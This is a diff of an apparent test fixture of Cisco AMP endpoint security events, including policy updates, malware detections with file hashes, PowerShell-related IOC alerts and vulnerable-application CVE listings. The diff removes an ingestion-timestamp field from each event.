Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "severity": 1, @@ -2642,7 +2611,6 @@ "action": "Policy Update", "code": "553648130", "id": "6508159571352093000", - "ingested": "2022-02-02T05:52:16.386320341Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -2713,7 +2681,6 @@ ], "code": "1107296274", "id": "1515298360312529000", - "ingested": "2022-02-02T05:52:16.386321291Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "severity": 3, @@ -2800,7 +2767,6 @@ ], "code": "1107296274", "id": "1515298355162029000", - "ingested": "2022-02-02T05:52:16.386322282Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "severity": 2, @@ -2880,7 +2846,6 @@ ], "code": "553648143", "id": "6508153524038140000", - "ingested": "2022-02-02T05:52:16.386323392Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "severity": 2 @@ -2959,7 +2924,6 @@ ], "code": "1107296274", "id": "1521062325693667300", - "ingested": "2022-02-02T05:52:16.386324366Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "severity": 3, @@ -3031,7 +2995,6 @@ "action": "Policy Update", "code": "553648130", "id": "6532910514396201000", - "ingested": "2022-02-02T05:52:16.386325346Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -3101,7 +3064,6 @@ ], "code": "1090519054", "id": "6525520937264087000", - "ingested": "2022-02-02T05:52:16.386326320Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "severity": 2 @@ -3198,7 +3160,6 @@ ], "code": "553648143", "id": "6525520937264087000", - "ingested": "2022-02-02T05:52:16.386327298Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "severity": 2 @@ -3276,7 +3237,6 @@ ], "code": "1090519054", "id": "6525516191325225000", - "ingested": "2022-02-02T05:52:16.386328283Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "severity": 2 @@ -3373,7 +3333,6 @@ ], "code": "553648143", "id": "6525516191325225000", - "ingested": "2022-02-02T05:52:16.386329297Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "severity": 2 @@ -3452,7 +3411,6 @@ ], "code": "1107296274", "id": "1519340132516139000", - "ingested": "2022-02-02T05:52:16.386330260Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "severity": 3, @@ -3539,7 +3497,6 @@ ], "code": "1107296274", "id": "1519340132474871000", - "ingested": "2022-02-02T05:52:16.386331220Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "severity": 2, @@ -3640,7 +3597,6 @@ ], "code": "1107296279", "id": "15193384389977", - "ingested": "2022-02-02T05:52:16.386332203Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "severity": 1, @@ -3740,7 +3696,6 @@ ], "code": "1107296279", "id": "15193384371995", - "ingested": "2022-02-02T05:52:16.386333156Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "severity": 1, @@ -3870,7 +3825,6 @@ ], "code": "1107296279", "id": "15193366641599", - "ingested": "2022-02-02T05:52:16.386334119Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application 